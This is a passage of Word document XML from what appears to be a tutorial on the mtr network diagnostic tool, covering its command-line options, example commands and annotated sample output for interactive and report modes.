            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6190C7E6"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m, --max-ttl NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A51BC64" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Maximum number of hops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2848DAB8" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482C887D"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f, --first-ttl NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F7CF827" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Starting TTL value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="51176EA3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFB83B6"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F89FCF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="11FA4AB3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFC4407"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ACA67BC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="20611144" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A107FBB"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lastRenderedPageBreak/>
              <w:t>-u, --udp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76010671" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use UDP instead of ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5E14DF51" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E02D0D"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T, --tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212D3347" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use TCP instead of ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1746DDCA" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61C80CED"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P, --port PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52A4CC85" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Target port for TCP/UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="01704F26" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B74F33"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L, --localport PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57660F93" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Local port for UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="16040E7D" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C9928FD"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B, --bitpattern NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC656FE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Bit pattern to use in payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="078C86D3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34AC9E70"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Q, --tos NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D46FE09" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Type of Service (ToS) field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="382ACE41" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351D012E"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a, --address ADDRESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C301DA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Bind to specific interface address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4252F83F" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D376715"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I, --interface NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317A77CE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use specific network interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2CF14259" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="040A5DA2"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G, --gracetime SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB6D40A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Grace time before forcing exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="54BC2D90" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E8B2B72"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t, --curses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0E8974" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use curses based terminal interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="786994ED" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="522CC20E"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g, --gtk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1D7DA3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use GTK+ interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5B693279" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05834994"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l, --raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18AA6173" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use raw output format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="611EE1B3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC2208C"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x, --xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B679DD5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use XML output format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3E8C777D" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78C56A63"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j, --json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="488F5A6A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use JSON output format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="76DA2413" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD0CE3A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">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C, --csv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E845C6A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use CSV output format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29A6D761" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A15C10" w14:textId="4078E1AE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Continuous monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495591A7"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mtr google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C18437" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA2167"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My traceroute  [v0.93]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE023C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host.local (192.168.1.100)                                   2024-12-06T14:30:15+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9DF2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Keys:  Help   Display mode   Restart statistics   Order of fields   quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02822AF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Packets               Pings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B80D9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Host                                    Loss%   Snt   Last   Avg  Best  Wrst StDev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF3AD8"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1. router.local (192.168.1.1)           0.0%    10    1.2   1.3   1.1   1.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1562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2. 10.0.0.1 (10.0.0.1)                  0.0%    10    8.2   8.3   8.1   8.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742B60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3. isp-gateway.net (203.0.113.1)        0.0%    10   15.2  15.3  15.1  15.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D7280"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4. backbone1.isp.net (203.0.113.10)     0.0%    10   22.2  22.3  22.1  22.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E511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5. google-peer.isp.net (203.0.113.30)   0.0%    10   28.2  28.3  28.1  28.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8FEB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6. lga25s62-in-f14.1e100.net            0.0%    10   32.2  32.3  32.1  32.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FE6BB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC35545" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interactive interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Real-time updating display unlike traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB20E4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Loss% column</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows packet loss percentage (all 0.0% = good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19A916" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snt (Sent)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Number of packets transmitted (10 per hop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F789E29" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Last</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Most recent round-trip time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31587DB0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Avg</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Average latency across all sent packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA86E8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best/Wrst</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Best and worst ping times recorded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C762E14" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>StDev</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Standard deviation showing latency consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD266CA" w14:textId="0491C8A1" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>StDev</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Very stable connection with minimal jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE560F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progressive latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 1.3ms (local) to 32.3ms (Google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F84EE5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-time monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Continuously updates unlike single traceroute run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7920B" w14:textId="298873FD" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Report mode (non-interactive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA6439"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mtr -r -c 10 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3A957" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24141EC9"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tart: 2024-12-06T14:30:15+0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EDD6F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HOST: host.local                    Loss%   Snt   Last   Avg  Best  Wrst StDev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D9D2C"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1.|-- router.local (192.168.1.1)     0.0%    10    1.2   1.3   1.1   1.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47638517"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2.|-- 10.0.0.1 (10.0.0.1)           0.0%    10    8.2   8.3   8.1   8.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5909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3.|-- isp-gateway.net (203.0.113.1) 0.0%    10   15.2  15.3  15.1  15.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB96E9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  4.|-- backbone1.isp.net             0.0%    10   22.2  22.3  22.1  22.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D36580"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5.|-- google-peer.isp.net           0.0%    10   28.2  28.3  28.1  28.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9BB84"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6.|-- lga25s62-in-f14.1e100.net    0.0%    10   32.2  32.3  32.1  32.5   0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB6C87" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F4C03" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-r flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Report mode produces non-interactive output for scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E3E82E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-c 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
